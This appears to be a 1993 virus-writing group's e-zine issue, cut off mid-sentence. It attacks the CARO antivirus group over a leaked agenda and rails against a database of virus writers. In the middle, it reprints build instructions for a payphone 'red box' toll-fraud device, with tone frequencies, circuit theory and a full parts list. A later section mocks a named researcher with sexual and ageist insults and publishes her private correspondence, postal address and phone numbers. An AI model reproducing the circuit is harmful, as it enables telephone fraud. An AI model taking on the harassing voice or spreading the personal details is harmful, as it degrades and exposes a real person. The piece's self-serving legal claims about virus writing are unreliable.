Initially, I wanted to do this wonderful spill on the legal aspects of cartels and collusion, but since this particular item cannot be substantiated as being 100% legitimate, I prefer to avoid any possible legal responses that may be incurred by doing so. I will therefore attempt to define some of the more relevant issues and let you be the judge. The New American Dictionary defines the CARTEL as: "A monopolistic combination of independent business enterprises." The same dictionary defines COLLUSION as: "A secret agreement for a deceitful or fraudulent purpose." Let's first look at a few statements from this "alleged" agenda. 3. Membership categories - I'd like to formally propose three categories - weeders, disassemblers, and advisory. Advisories don't want, or get, the viruses. Disassemblers have to do CARObase entries. For weeders, see below. It means we modify Vcircle, and we don't give the password to the advisories (e.g. Yisrael R. , Ken van Wyck, etc..) The third motion in this agenda makes reference to the word "MEMBERSHIP." Although this does yet imply any businesses or transactions, we can safely assume that CARO is indeed a structured organization. 4. Consideration of new applicants. - John Buchanan asked me if he could join. He hasn't formally applied, though. - I'd like to suggest Sara Gordon - Iolo Davidson ( worked at S&S for a few years, has my collection, author of Virus Guard, does disasms ) - Steve Hill (something might have gone wrong with the vote, as there is no record of no votes, according to Chris Fischer) - Any others In item 4. we can now assume my claim of CARO being a "STRUCTURED" organizations correct due to the reference of "FORMALLY APPLIED." 7. Proposed action against organised virus writing groups - working group to be formed, I suggest, with 2/3 US members (Glenn, Joe, Ross?), 1/2 Euros. It's mostly a US problem, now that ARCV have gone :-). We should set up a Murky Database (Handles, BBSes, Names, Addresses.) The objective is to get a police prosecution against anyone who is committing a crime (but not, of course, against anyone who is not committing a crime) In line seven, we may be able to link "BUSINESS" into the picture if the people mentioned, Glenn, Joe, and Ross, are the same people as those we know as Glenn Jordan of DATAWATCH (Virex PC), Joe Wells of SYMANTEC, and Ross Greenburg, author of FLU-SHOT. If such is the case, then we have representatives of a common field, uniting efforts for a common cause. There is nothing illegal here and it is not implied that there is anything illegal with what they may be doing. 8. Identification and naming - if Frisk isn't there, that'll have to be deferred. But maybe Vess and I can do some stuff. In line eight, we have yet another reference to a person who could quite possibly be Fridrik Skulason, author of F-PROT. 11.4 An undertaking from those who want to participate. The disadvantages are that you get to do lots of work, and everyone benefits. Your company might not permit this. I suggest we call these CARO members the Weeders. Non-weeders don't get the garbage files (why would you want them? ), and get the viruses slightly after the weeders do. In line eleven, subsection four, we can see a reference made to the word "COMPANY." This seems to substantiate the claim that the actual companies are involved with the CARO organization. We can clearly see that the some members of CARO do work for companies that may, in the long run, benefit from the efforts of this organization's findings. I am concerned that CARO might possibly become a cartel. Membership in CARO is restrictive in nature, which conceivably keep other companies with software ideas from joining and sharing the same benefits. Essentially, this situation could be construed as a barrier to entry under ideal conditions. If CARO can manage to encompass all of the "select" companies, then quite possibly CARO may gain a monopolistic control over the market. Although there is one organization that presently holds the majority in market share, the possibility for a combined effort producing a new technology exists. All of us know that this one person must soon adopt a new method of detection and eradication or his product produce will quickly become too cumbersome for any practical use. You think about all the possibilities! Moving right along... Let's look at the second definition that I mentioned earlier in this text. Collusion! According to the dictionary definition of the word, collusion does not always have to imply "illegal" activities, only deceitful or fraudulent. With this in mind, take a look at some of the following excerpts from the "alleged" CARO agenda. 12. The CARO Virus Collection. I think that it is really important that there be no such thing. That way, if people ask for it, or claim they have it, then it's nonsense. Can we so move - there is no such thing ? This is self explanatory, but what is all this tripe in the new set of statements? 5. CARO Base We need to come to a conclusion. Maybe the weeders (see below) are excused from CARO basing, on the basis that they are contributing as weeders ? That also gets Vess off that hook. Okay! So there is a CARO base! 6. Virus Tagging We have a leak somewhere. I'd like to find it, and stop it. So we need to tag the viruses - that's easier than it sounds, these days. Lets decide how. The "BASE" is obviously a "VIRUS" base! 11. Sharing the work on collections. I'd like to propose that for future collections like Stang's collection, or Buchanan's where the main problem is sorting the wheat from the chaff, that we divide the work up. You should be prepared to: 11.1 Sort out the viruses from the non-viruses (that's the main workload) 11.2 Isolate the non-viruses (put them in Zip files, marked Intended, Innocent and Garbage) 11.3 Make a replicant of the viruses into a group of Goat files (I am willing to donate my little files [ big deal]) so that we all have N replicant and the original. And a small descriptive text file of the basic info, which is (roughly how it infects, roughly what it infects, is it encrypted, is it stealth, is it polymorphic). This is preliminary info, which you'll get as a result of replicating the viruses without doing any real work. Put this text file, plus the replicants, in a Zip, and if we all do some of the collection, many hands make light work. Since the work is proportional to the number of files I suggest that we divide it on that basis. If N people volunteer to be weeders, each one will get 1/N of the files in the collection. This idea only applies to collections that are large and likely to be weedful, and I think we should expect more such in future. 11.4 An undertaking from those who want to participate. The disadvantages are that you get to do lots of work, and everyone benefits. Your company might not permit this. I suggest we call these CARO members the Weeders. Non-weeders don't get the garbage files (why would you want them? ), and get the viruses slightly after the weeders do. 11.5 Someone to act as a central coordinator/ collator/ disseminator. Vess is the obvious candidate, but he might have too much on already. Again, we're back to square one! Someone is going to now say that the CARO Virus Collection doesn't exist, or at least make a motion to this effect. 12. The CARO Virus Collection. I think that it is really important that there be no such thing. That way, if people ask for it, or claim they have it, then it's nonsense. Can we so move - there is no such thing ? 14. Dinner. Beer. More beer. ...and last but not least, the last line of the "alleged" CARO agenda. Having read this article time and time again, I am convinced that they must have done line fourteen for at least three days prior to ever discussing line one. You decide for yourself what these people are doing. I only wanted to take the opportunity to show it to you the way I see... Of course, I could be wrong, but as I see it, CARO may be able to monopolize the industry if they control the mass collection and can manage to restrict it from those whom the may not "approve." Couple this with legislation in their favor and the general public will be in for quite a shock. I dare say we would see any "free" software any longer. Who works for free? How many people can you count on one hand that are trying to do something for YOU? Special thanks to Time Lord of Phalcon/SKISM for snatching the agenda at the New York conference! ARiSToTLE/NuKE =============================================================================== ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "CARO's Undisclosed _Illegal_ Meeting Agenda" Nu Nu PART 2 KE KE -N -N By uK uK Rock Steady E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 % I've Been Watching You For A La-La-La-La-Long, A La-La-La-La-LONG, Long Time % % Amendment Seven of the CARO Meeting Agenda % 7. Proposed action against organised virus writing groups - working group to be formed, I suggest, with 2/3 US members (Glenn, Joe, Ross?), 1/2 Euros. It's mostly a US problem, now that ARCV have gone :-). We should set up a Murky Database (Handles, BBSes, Names, Addresses.) The objective is to get a police prosecution against anyone who is committing a crime (but not, of course, against anyone who is not committing a crime) I've read this paragraph several times over, and I just cannot believe the filth in it. This above paragraph is certainly illegal, according to Canadian and American law. This above paragraph goes against the Privacy Act. I've looked at American, Canadian, English and Australian law concerning about the Privacy Act(s). In Quebec (a province of Canada) we have adopted Law 68 this spring. The law restricts/forbids the sale of lists, that private companies have collected and stored. It gives Quebecers the right to see information about them, that private companies have collected and stored. It also reserves the right to database compilation lists to governmental agencies ONLY! However, CARO does not have any right whatsoever to create a database to begin with, because it has no relation to those on the database. A magazine company can have the right to create a database on its subscribers, as it is needed to send out their product. CARO's database is not composed of their clientele, it has no relation to those on its database. CARO is acting like a law-abiding body, which it IS NOT. CARO intends to compile a database of those "committing" a crime! ONLY, and I repeat, ONLY government agencies can compile a list of "criminals." But those on that list have been formally charged and tried in a court of law. These government agencies have the right to say that those on the list are criminals. But CARO is not a government agency, it does not hold the power of jurisdiction on anyone or anywhere! CARO can be charged for a conspiracy simply be compiling this list! One has to understand that organized _virus_ groups, such as NuKE, are rightfully legal. The law does not restrict the production of viral code, the law CAN NEVER restrict the production of viral code, it would simply be UNCONSTITUTIONAL if such a law were made. It's plain dumb, and we at NuKE laugh at those like CARO, out to create such ridiculous law(s). One also has to understand that _no_one_ can restrict what an individual does in his/her personal computer. As long as it is in the privacy of their own personal computer, and it does not affect anyone _directly_, you can do whatever pleases thy soul. And if people wish to share amongst themselves any new viral code, they can! See, if the two parties agree in sharing viral code, no law has been broken. Those that call a NuKE BBS (such as Cybernetic Violence) and request virus base access are granted access upon validation. This too is legal! Once you answer "yes" to the question of viral access, you have taken upon the responsibility of receiving any virus. See both parties agreed on sharing viral code, therefore neither of the parties were malinformed about the viral sharing, and it does not affect anyone directly! Therefore this act is legal according to law. When is the law broken? Within NuKE this doesn't seem to occur, but lets look at CARO, shall we... Gathering information like a person's true name and address is enough for CARO to break the law. People have a right to privacy, and once that right has been taken away by some dimwit at CARO, once your right to privacy has been raped from you, you can file suit for damages. In this situation, both parties, (CARO and the person on the CARO list) did _not_ come to any agreement what so ever, to be included in such a list. Also the CARO's list implies that those on this list are law-breakers, criminals, bottom-of-the-food -chain fungus. This is a great basis for suing for damages. You also have to understand that CARO is NOT a governing body! Therefore CARO has _no right_ to judge who is a criminal and who is not a criminal, as it does not hold the power of the law. Therefore CARO can _never_ compile a list of virus writers to be submitted for prosecution under legal boundaries. The _fact_ of this database is so controversial, that we very well can see a conspiracy in the making here. How is that? Well, HOW exact is this database that CARO is compiling, what methods are they using to collect this information? Are they trying to bond an Alias to a body? If CARO has reason to believe that "Rock Steady" is the blame for some criminal acts, who is to blame? Are we going to _presume_ that Joseph Greco is Rock Steady? What are the implications of this, if it were true? Does Joseph Greco contain any legal documents that tie him to the name Rock Steady? How are you going to prove this? Also, how clear is he tied to the crime? Is the crime the result of a computer virus created by Rock Steady? If that is the case then for every murder resulting from a gun we should charge the manufacturer of the gun, too! Oh how moronic, only someone belonging to CARO could come up with such a rule. I can scream out all day that Joseph Greco is Rock Steady, it still is not valid in court. Information like that is invalid because it can be easily replicated by anyone, it is not authentic like a signature or handwriting style. But what is needed to get a prosecution is _not_ the fact that Joseph Greco used the name Rock Steady, or the fact that Joseph Greco IS Rock Steady for that fact, but that Joseph Greco was the one to commit the criminal act! And it is _extremely_ difficult to proof that. Because you really need to be 110% sure that Joseph Greco committed the crime, and the only way to do that is to convict him at the moment of the crime. Which is fairly impossible to do, round the clock surveillance is required, which of course would require a warrant. The legal system is an amazing system at work, and all that is needed to throw out a charge is one doubt. The legal system has to prove that you committed that criminal act, _without_ any reasonable doubt. I've raised several reasonable doubts, and can continue throwing them at you till I die. Statistic show that, of all computer criminal charges laid, only 25% (figures were extracted from Statistic Canada, and relate to Canada computer crimes only) have been found guilty. Of course we need to "trim" the figures to reflect virus and security related criminal acts. In turn less then 5% would be the result of virus and computer security acts. In 1991 operation Sundevil began in the USA, which was conducted by the Secret Service; in turn, 50 arrests were made, 200 computers and 50,000 diskettes were confiscated, and the only charge to be brought to court was for the result of the E911 article that was published in Phrack Magazine. In result the editor of the Phrack magazine responsible for the article pleaded GUILTY, and yet found to be not guilty as charges were dropped. Steve Jackson Games filed a suit against the Secret Service for the illegal confiscation of their computers and the damages caused by the Secret Service. The Secret Service in turn was found guilty, and Steve Jackson was awarded US$100,000.00 in damages. Therefore in fact, operation Sundevil was perhaps the biggest flop ever to be conducted by the Secret Service, which lasted a complete year, where salaries were being paid for hundreds of men, and in result thousands of dollars loss in legal fees and a charge against them which cost US$100,000.00, and every penny of operation Sundevil was from taxpayer's money. Hard earned money of every day taxpayers like you and me, that busted their hump earning each penny. We are being raped by technology-driven companies, such as closed-circuit television and electronic access cards used to monitor workers in offices. Personal communications devices, which are changing how we use a telephone, would be assigned to people, not fixed locations; that would make it possible for the phone company to know where the caller and recipient were when a call was made. These are security problems associated with cellular phones. Hopefully one can understand where all this can possible lead to. We are entitled to data-protection rights! Personal information should be collected only where warranted, and use of it and access to it should be subject to tight controls. After reading this article, many of you might well be tempted to crawl into your bed and pull the cover over your head. But that would be to succumb to the "technological trance." Instead all of us should become _more_ vigilant, and press harder for our rights. Rock Steady/NuKE =============================================================================== ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "Toll Fraud Device" Nu Nu KE KE Typed By -N -N uK uK Rock Steady E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 I typed up the following article entitled simply "Toll Fraud Device" from the Summer 1993 (vol. 10, no. 2) issue of 2600 Magazine. The article is uncredited in 2600, so we're not quite sure who to thank... Anyhow, since we've done articles about red boxing in the past and have received tremendous response, we thought our readers would like to see a great new optimized design for a red box. Enjoy! Rock Steady/NuKE ------------------------------------------------------------------------------- % Toll Fraud Device % We at 2600 are often asked, "What is a toll fraud device?" Well, we decided to answer the question once and for all. This red box is a toll fraud device. Why is it a toll fraud device? Because any red box that can be built this cheaply and this easily and can fit in the palm of your hand was clearly _not_ made for demonstration purposes. Okay, so what is a red box? Well... a red box is hacker slang for any device that simulates payphone coin signalling tones in North American payphones. Red boxes emit the precise tones used by payphones to tell the local switch that the appropriate coinage has been inserted. The tones are played through the mouthpiece in lieu of dropping coins into the payphone. This particular red box is particularly fraudulent in that it only simulates quarter tones. After all, when one commits toll fraud one does not want to waste time pumping virtual nickels and dimes into the payphone when quarters work quite nicely thank you. For those of you who are technically minded, the theory behind the circuit is easy enough to grasp. The DTMF encoder (U1) used in conjuction with the crystal (X1) produces the desired frequencies. The decode counter (U2) controls the cadence or how many frequency pulses are used. The 555 timer (U3) used in conjunction with R1, R2, and C1 produces the actual pulses and controls how fast they are delivered. The circuit is a good hack because it utilizes the carry flag on U2 to overcome any stray charge on C1 that may cause the first pulse from U3 to be inaccurate. It accomplishes this by ignoring the first five pulses produced by U3, processing the next five, ignoring the third, processing the fourth, ignoring the fifth, etc... The circuit is also a good hack because it utilizes that well known coincidence in the DTMF encoderm, the fact that substituting a 6.5 Mhz crystal for a colorburst crystal (3.579545 Mhz) just happens to raise the "*" key frequencies from 941 and 1209 Hz to approximately 1708 and 2195 Hz. Since the desired frequencies for a quarter tone are 1700 and 2200 Hz, the output of the cicuit is well within tolerance. The cadence is determined by the RC combination in U3. Each pulse lasts approximately 30ms, followed by 30ms of silence. So fraudulent is this red box that we at 2600 have nicknamed it the Quarter. While all members of 2600 [and NuKE -RS] are morally righteous, and do not advocate the use of red boxes for fraudulent purposes, we must admit that if we ever did decide to commit toll fraud, we would trust nothing less than a Quarter to do the job. Obviously, the Quarter will not work with Customer Owned Coin Operated (COCOT) payphones. You may also have some difficulty with newer electronic payphones, as the phones companies are finally getting hip to these little devices and are isolating the talk path from the receiver until the call is established. Still, your Quarter should provide you with hours of fun-filled listening entertainment. In a world where a one minute payphone call from Washington DC to New York costs $2.20 (at the maximum discount rate no less!) it will hardly surprise us at our suburban offices if, while sipping ou afternoon tea, we happen to read about a sudden proliferation of Quarters across the U.S. V+ V+ Ŀ Ŀ Ŀ \ 1 16 /R3 \Ĵ16 3Ĵ12 \ SPKR U1 U2 / /Ĵ6 11Ĵ14 15Ĵ 7 8 13 6 X1 R1 R2 /\/\/Ŀ Ŀ V+ 3 6 2Ĵ Ĵ8 \Ŀ U3 C1 S1 Ĵ4 1 NOTE: All crossed lines on the diagram are points of connection. PART LIST: RESISTORS VALUES NOTES R1 220 kOhms The exact values of R1 & R2 are not R2 220 kOhms important so long as their sum is 440. R3 1 kOhms CAPACITOR VALUES NOTES C1 0.1 uF CRYSTAL VALUES NOTES X1 6.5 MHz 6.5536 MHz is also within tolerance. CHIPS(IC) NAME NOTES U1 TCM5089 DTMF encoder U2 74HC4017 Decade counter. Regular 4017 is okay. U3 CMOS 555 Timer IC. Regular 555 is okay if a 1 kOhm resistor is inserted between pins 3 and 8. SPEAKER IMPEDANCE NOTES SPKR 600 ohms U1 expects an equivalent load. SWITCH TYPE NOTES S1 Momentary You may also want to add a power switch. As printed the circuit expects three triple 'A' batteries for a total of 4.5 volts. A 9 volt battery may also be used, but R1 and R2 should then total 470 kOhms instead of 440. Obviously, you will need a perfboard and chassis if you expect to build the circuit. Parts may be ordered from electronics firms. Remember to order at least two of everything so that you will have spares in case you mess up. =============================================================================== ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "To sara gordon Or Not To sara gordon, That Is Nu Nu The Question" KE KE -N -N By uK uK Rock Steady E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 % To sara gordon Or Not To sara gordon, That Is The Question % In a previous NuKE Informational Journal (#6), we had published an editorial by Rock Steady concerning the "know-about" and experiences that Rock Steady has encountered with Ms. Sara Gordon. To our surprise [yeah, right], Ms. Gordon denied several statements we had written about her, so we at NuKE asked Sara to write us a response pertaining to that article so we could publish it in the upcoming InfoJournal. What you are about to read is the actual letter Ms. Gordon send us, untouched and unedited. The reason for this is so that Miss Gordon can comprehend that we in NuKE have no intention to bad-mouth anyone, nor will we let our emotional judgement cloud our writing. This "Information Journal" *is* factual hard-core information, and nothing less. I want you to read the following two captures. One is the reply from Ms. Gordon. The second is a _private_ reply from Ms. Gordon to John Buchanan (ARiSToTLE). All sentences beginning with ">" are quotes from the original article in the previous IJ. The rest are Ms. Gordon's comments (and her vivid imagination). All sentences in brackets are comments by Rock Steady and NuKE. % Capture #1 -- Sara Gordon's Official Reply to NuKE % --------------------------------------------------------------------------- i've been sent your6 info journal (not by one of your own people this time), and wanted to comment on something in it: the comments are both to you and to the fellow who wrote these quotations: >Get the picture? Yes, we all heard it before, I'm a deranged lair. The Anti- >Virus community is _not_ maniacal to associate themselves with us. We all >heard of Sara Gordon screaming out, `I never called an underground exchange >board', she will never admit it. Nevertheless Sara Gordon holds the phone i do not say i have never called an underground exchange board. why, in our conversation last night i told you i -have- call them, to talk to the sysops and virus authors. i have called on at least 10 of them (not many, i know), that deal strictly with viruses. some in u.s.a., some not. i don't upload viruses to them. i don't call them to 'spy' on what is going on there. usually i call if i'm invited. i've talked about calling them in several articles. why would you think i would deny this. [10 times? 10 to what power? Don't upload viruses to them?! But you do upload viruses to the so-called AV, right? The AV is the cause of all the viruses out there, not us.] and i don't scream. thats the radish's job. and, i use my real name when i am the one calling. why, sometimes even other people call using my real name :). [You don't scream? Hmm, you sound calm enough -- I wondered what happened in the next capture!] however, if by association, you mean, do i do the same things you do, the answer is i do not; at least, i don't write and distribute computer viruses, or hacking/phreaking/carding information. [True, we don't harass people, or try to "double-dare" them to do vengeful acts for you. What's this now, you DON'T distribute computer viruses? Not even to the AV? Come on you know that _is_ a lie. Sara, we _don't_ suspect you of distributing viruses, we _KNOW_ you do. It's been proven by our receiving of viruses... If you must lie, please make them more believable, put in some statistics in 'em sentences, at least it'll be partially right.] >number of Cybernetic Violence, Black Axes, The Hell Pit, etc. Sara doesn't of course i've called black axis. or it is axes now? and, i've talked to kato at the hell pit a few times. voice, even, after the ridiculous phrack article. i think its been over a year now though since i've called him, or he has called me. [I know you have. I also know your "Dark Avenger article" was the best scam ever. ]<0oL YoU'r 0w N 0f s!] ive never called cybernetic violence that i can remember, i think i -may- have it in an overhead slide for a presentation, but i've not called it. i told you this last night. 'holds the phone number of'...gee, so does the phone company. and probably every law enforcement agency in the world. [Gee, Sara, but you seem so damn proud to tell people that you hold the numbers...] >associate herself with low-lives like ourselves, as she explains. Nevertheless >she has CLAIMED to have called up The Hell Pit BBS, and uploaded 3 fake viruses >and exclaims how easy it was to obtain virus access there. Now there's a wait. what exactly are you talking about here? can you please explain [Oops, memory lapse!] this? it -is- easy to obtain access there. and yes, three dummy viruses were uploaded there to prove this point. it was a (very small) part of some research data gathered to illustrate that the real problem of virus exchange bbs was not the -viruses- but was the attitudes being presented and tossed about. why, screaming radish, you agreed with me just last night on the phone (when you called me) that a lot of those people are putting out attitudes that -are- the problem. [Our point exactly, and now your stealing our ideologies. You seem nice and calm in this message, but that is because you _know_ that this article was to be published, but what about articles you don't expect published? Are you this well-bred in them? I think not, as we reveal your private e-mail in the next capture. BTW, any security flaws at the Hell Pit have been fixed long ago...there's no way she could get in now without a real virus.] as far as not associating with what you call 'low lives like ourselves', don't be silly. i never said i dont associate with anyone, i don't call virus exchange bbs and upload computer viruses, because i think that once i would let a virus out of my control, i would have done an irresponsible thing. [You didn't seem so distressed by helping to distribution of NED amongst the AV. Remember the AV _are not_ better than us. They are not above the law, and they don't have "better" morals then we do. They _think_ they do, but deep down its that money they wants. And they'll do whatever it takes to get it! Hmmm, capitalism, ain't it charm. Then you wonder why we wish to be anonymous, we have lives...] i've never called anyone a low life that i can recall. you are that one who keeps using that term regarding yourself. i know only a small portion of your lives, and wouldn't begin to judge you. i only say that certain actions of virus writers are irresponsible; those actions i can judge because i've seen the consequences of them [You can't recall? Humms, memory lapse (again), common in elderly women, isn't it?] >contradiction. Now who are you going to believe? Rock Steady, with a record for >hacking, and suspected of other cyber-crimes, or Sara Gordon with not even a >bug-stain on her record? Wait, let me tell you some more. Sara Gordon is not >totally `white', since Sara doesn't associate herself with `us', I guess the >conversation we had concerning her wanting to invite a person called `Nowhere >Man' to dinner was a figment of my imagination. Also, the crap she said to me, of course i associate with you. why would you ever think i would say i don't. i did want to invite nowhere man to dinner. why not? ive had dinner with far more proficient virus writers and hackers than him :) seriously, why would you think i would be 'ashamed' of this? [WAIT! Now you associate with me? This memory lapse thing is much more serious than I thought! A word of advice when lying, Sara, try sticking to ONE and ONLY ONE fabrication, don't start combining it with memory lapse and then other stories. Hell, why would you be ashamed of associating yourself with me. I _can't_ think of any reason!?! This associating think scares me, I think its time NuKE chips in and gets you a man, unless of course that isn't your preference! (No offence intended.)] [Well, Sara, name those "more proficient virus writers" you've "eaten" (69?) with. Perhaps your sweetheart, Dark Avenger? I can see it now, a bottle of wine, some roses, that charming Slavic accent...head over heels I tell you. See Rock, she is straight, after all! BTW, I have never claimed to be a hacker. I am not a hacker, and I resent being associated with hacking, which is an (wrongfully) illegal activity in most areas, whereas virus writing is not -- and I don't support illegal activities. I dunno, I bet her memory problems is caused by some new virus from Bulgaria...a sexually transmitted one. :-) -NM] i don't know what your problem is with me. i run a free bbs to give out information on viruses and security. i write articles that bring the positions of both sides into the public eye. [You bring the positions of both sides? Right...] im really quite tired of being quoted for things ive never said. get this straight--i do not find any problem with writing a computer virus. [Uh-oh, that memory problem again...] it's code. what is the problem, at least as i see it, is the irresponsible act of letting that code out of your control. as i said to SR, if you let people d/l viruses from your bbs, you are helping to increase the problem. you're helping to add to the already shaking trust situation that exists out there. well, since your last journal said this is your goal, to eliminate every last piece of user trust in anti-virus software (you specified frisk and mcafee, i think), i guess you are accomplishing your goal. congratulations. personally, i think its irresponsible, and not only that, you are helping some of the anti virus product developers who do prey on the same fears to keep right on taking advantage of the innocent users. [So what are you going to do? Outlaw Viruses to "regular" people? And only AVers will be able to hold virus collections? That's almost like racism. What makes you better than us? We do this for the intellectual challenge, we don't seek money, we only teach those that wish to be taught! We also teach awareness, truth, reality. At least we agree about the anti-virus makers, making big bucks from this. But we can't bluntly make a law that is "racist," you don't have to be from different ethnic groups to inflict racism you know.] >about getting her in contact with virus writers in Australia, was a figment >of my vivid imagination. Come on Sara, I heard it and you said it. Of course, >this is simply my word against yours. Son of a gun Sara, didn't you hear all >them `clicking' noises during our conversation? There was someone else on the >line Sara! Someone, that kept on receiving calls, and therefore he/she had to >switch and answer the call, via MaBells `Calling Waiting' service. oh, you recorded the calls? i don't have call waiting, and i don't care if whoever listens to your calls listens to mine. yes, of course i said it. and yes, of course i wanted to get in contact with talon (harry mcbungus, terminator zed, et.al). i talk to a lot of virus writers, and hackers. what makes you think i would deny this? i would not deny this any more than i have publicly stated the errors i made when i first got involved in the fun world of computer viruses. i've never tried to hide any of this. in fact, ive had it published, in major publications, as well as conference proceedings. why do you think i'd try to hide my contact with anyone? [Of course you don't hide from contacting virus writers, it gets you alot of coverage, humm 4 straight issues of VNI, nice. I'm quite sure you got those articles laminated in wood, right? But what _measures_ will you _seek_ to endure in these contacts. That is the question at stake, Sara.] >See I guess this isn't after all, just a figment of my imagination. Since I >conference the call, my phone bill supports the fact that TWO calls were made >at the same time from my number! One was to the alleged person in the >background while the other was yours! (Sara) must be. i don't exactly understand what you are talking about, but i guess you do. i figured you were conferencing. hope you paid for it. by the way, why did you try to tell me you were talon? your accent is definitively from montreal. [Don't understand? Instead of memory lapse, you now conclude that you don't have an adequate grasp of the English language? Nice One! Hope I _paid_ for it?! You think I'd risk calling anyone up fraudantly? That's _illegal_ Sara, I'm sure I got tons of officials "expecting" me to do just that so they may get rid of me for good. Uh-uh girl, I wouldn't give anybody a second in the day to catch me in any illegal activity.] its pretty rude to allow other people to listen in to conversations; most adults wouldn't do it. do you think its just normal and acceptable to do it? i don't. however, i would not have 'denied' any inviting of virus writers to dinner or elsewhere even if you didn't have some 'proof'. i've clearly stated, in publication (see this months personal computer world u.k.) that i talk with a LOT of virus writers. [Pretty rude? It's my word against yours. This way I got someone backing me up on your side. Don't expect CARO membership just yet, girl.] >Oh yes, I'm a bored teenager derange liar wanting to bust balls. Frankly, no one >admitted in NuKE is a teenager. Frankly I'm currently in a respectable banking >position, nevertheless I still am pursuing my Masters in Mathematics, and may >this even lead to a Ph.D., of course by then I'm expected to sprout out of my >satanic puberty stage and into adulthood. Even though I'm way passed the legal >adult age, may you still say its a hormone thing. Frankly, when just is not done >and lies are tossed over to the public, discrediting our history, with your >influence of power. Until that day of just, until >that day of truth comes out, then that will be the day you will get rid of me. no one admitted in NuKe is a teenager? better check those birth certificates... [Lemme guess, its a _reading_ problem now? Flash me yours and I'll show you mine . Uh, birth certificates, I mean.] >You see this isn't about me, this is about the you. >This isn't something you `mature out of', when do you mature out of injustice? >In what point of life is injustice okay? it's not ever okay. >The Virus problem has been solved, now what about the Anti-Virus Problem? okay, so after our talk last night i had a few ideas i wanted to talk about with you, but if -this- is the kind of thing you are going to print, i think probably you don't want to hear what i have to say. i think it seems you would rather print things you imagine. [Trust me, if -this- is your kind of attitude, take a walk sister. No fame coming to you from our direction...] sara -- SGordon@Dockmaster.ncsc.mil / vfr@netcom.com bbs: 219-273-2431 fidonet 1:227/190 / virnet 9:10/0 p.o. box 11417 south bend, in 46624 the villian goes to jail, the hero goes free. i wish it were that simple for me. @Via RTrk 3:632/998@fidonet, Jun 25 1993 at 02:24 ----------------------------------------------------------------------------- % Capture #2 -- The Juicy Part % In the following capture from Sara Gordon, who hot-bloodedly tried to shoot NuKE down due to our gain of public support Ms. Gordon still likes to imagine that NuKE is a bunch of hackers intent on viral destruction. This is as spurious as you can get, NuKE is a publicly available organization. Anyone is free to call up our systems and request access. We have nothing to hide, all is open. We wish to communicate with the public to a great extent. This also is an invitation for people in ALL walks of life who may speculate about NuKE to simply call us up! I cannot talk on behalf of every NuKENet BBS out there, as I cannot control them, but I can speak for myself, and I invite anyone to call the World Headquarters of NuKE, Cybernetic Violence, +1 514 426 9194. We feature a 14.4k v.32bis US-Robotics modem, and also have Bluewave mail installed into our BBS so that you may download/upload all messages without having to stay online reading messages. As we too understand that time is costly over the phone lines... ----------------------------------------------------------------------------- * Originally by Sara Gordon, 1:227/190 * Originally to John Buchanan, 1:271/297 * Originally dated 24 Jul 1993, 11:35 * Original: FROM: Sara Gordon * Original: TO: John Buchanan * Original: AREA: _Local * Forwarded by Sara Gordon * Forwarded Using QuickBBS 2.76 * Forwarded at 11:40 on 24-Jul-93 In a message to Sara Gordon <07-24-93 10:29> John Buchanan wrote: JB> Sara, JB> I guess what makes me so cotton-pickin mad about the AV are posts JB> like what I saw you direct towards me. The "ENTIRE" set of NUKE echoes i only responded to a statement you made that is incorrect. JB> are open to the public, yet you choose to imply they are private. they are not open to the public. i don't imply it. i state it quite clearly. so, then you will be fwding the pertinent posts to the public? i bet. would you like me to do it for you? c'mon john. you don't expect me to believe that i will have access to those echos if i call you bbs? -all- of them? ok, lets see. you tell me i will, and ill call and check it out. [Notice the different attitude expressed by Miss Gordon, when she _doesn't_ expect anyone to be reading private Netmail! Notice the hot-blooded tone of voice. Notice how she double dares Mr Buchanan ("c'mon john"), insinuating that John is afraid to post it to the public that NuKENet is available to anyone, which it is! As long you support NuKE ideologies, and respect what people have to say, then NuKENet can be easily obtained for your BBS. Actually I _double dare_ Ms. Gordon to pick up NuKENet and make it publicly available to her users! I guarantee she won't "lower herself to our level"!] JB> Also, you state that they carry posts concerning PBXing and such. To JB> my knowledge and extent of control, they do not exist and should they you know they do. and you know that i know it. so lets stop playing around, at least have the decency to be honest about it. [What a ! She will not stop screaming! In the past, we have plucked out any system on NuKENet that posts any illegal material, such as PBXs! (Just in case Miss Gordon wonders what "illegal material" means to us.) Today, we still stand on that same agreement and we are happy to report that no such posts has made itself known on NuKENet! Sara claims she has many, many people that capture messages from NuKENet and bring them to her. Yet she has NEVER had any real proof of her phoney statement. Let's just face it, Sara's a FAKE!] JB> maker their appearance, I take EVERY action available to me to either JB> squelch them or cut them off at the source. It really rips my tail JB> when people in your position abuse the "language" of professionals oh please, if you make every effort to cut it off then why is it so blatantly still there, repeatedly? im not in any 'position'. im just a normal person who lives in the cyberspace, and who is sick of seeing it get all screwed up. [Notice the attitude once more. She REFUSES to hear us out! We at NuKE under- stand, and have the dignity to respect any opinion Miss Gordon has to say, right or wrong, we have even published her reply to our previous NuKE IJ article, unedited! Yet, she refuses to hear us out, personally she seems to express a hatred towards us. And no matter what we do, Miss Gordon will always detest us. She complains that "virus writers" show utter hatred towards her. I guess they saw the _real_ Ms. Gordon, as we are witnessing in this private e-mail.] JB> You wonder why I do the way I do in the echos. Nothing I post about JB> the AV is made up in fabrication sessions. I try to inform the JB> general public about their involvement in the virus exchange arena JB> and the underlying motives in this issue of legislation. Why not take JB> a different stand and research what I say? If it ok by you, I will i have researched what you say, john. and what you do. what you post is made up in some cases. you want me to quote it for you? forget it. im finished trying to help a bunch of people who want to destroy what is precious to me, and to a lot of other people. [No, Miss Gordon, it is _we_ whom have researched you. And not only did we not buy your first reply, according to the reply of NuKE IJ #6 article (that first reply was unbelievably bogus, as it didn't express _any_ of your 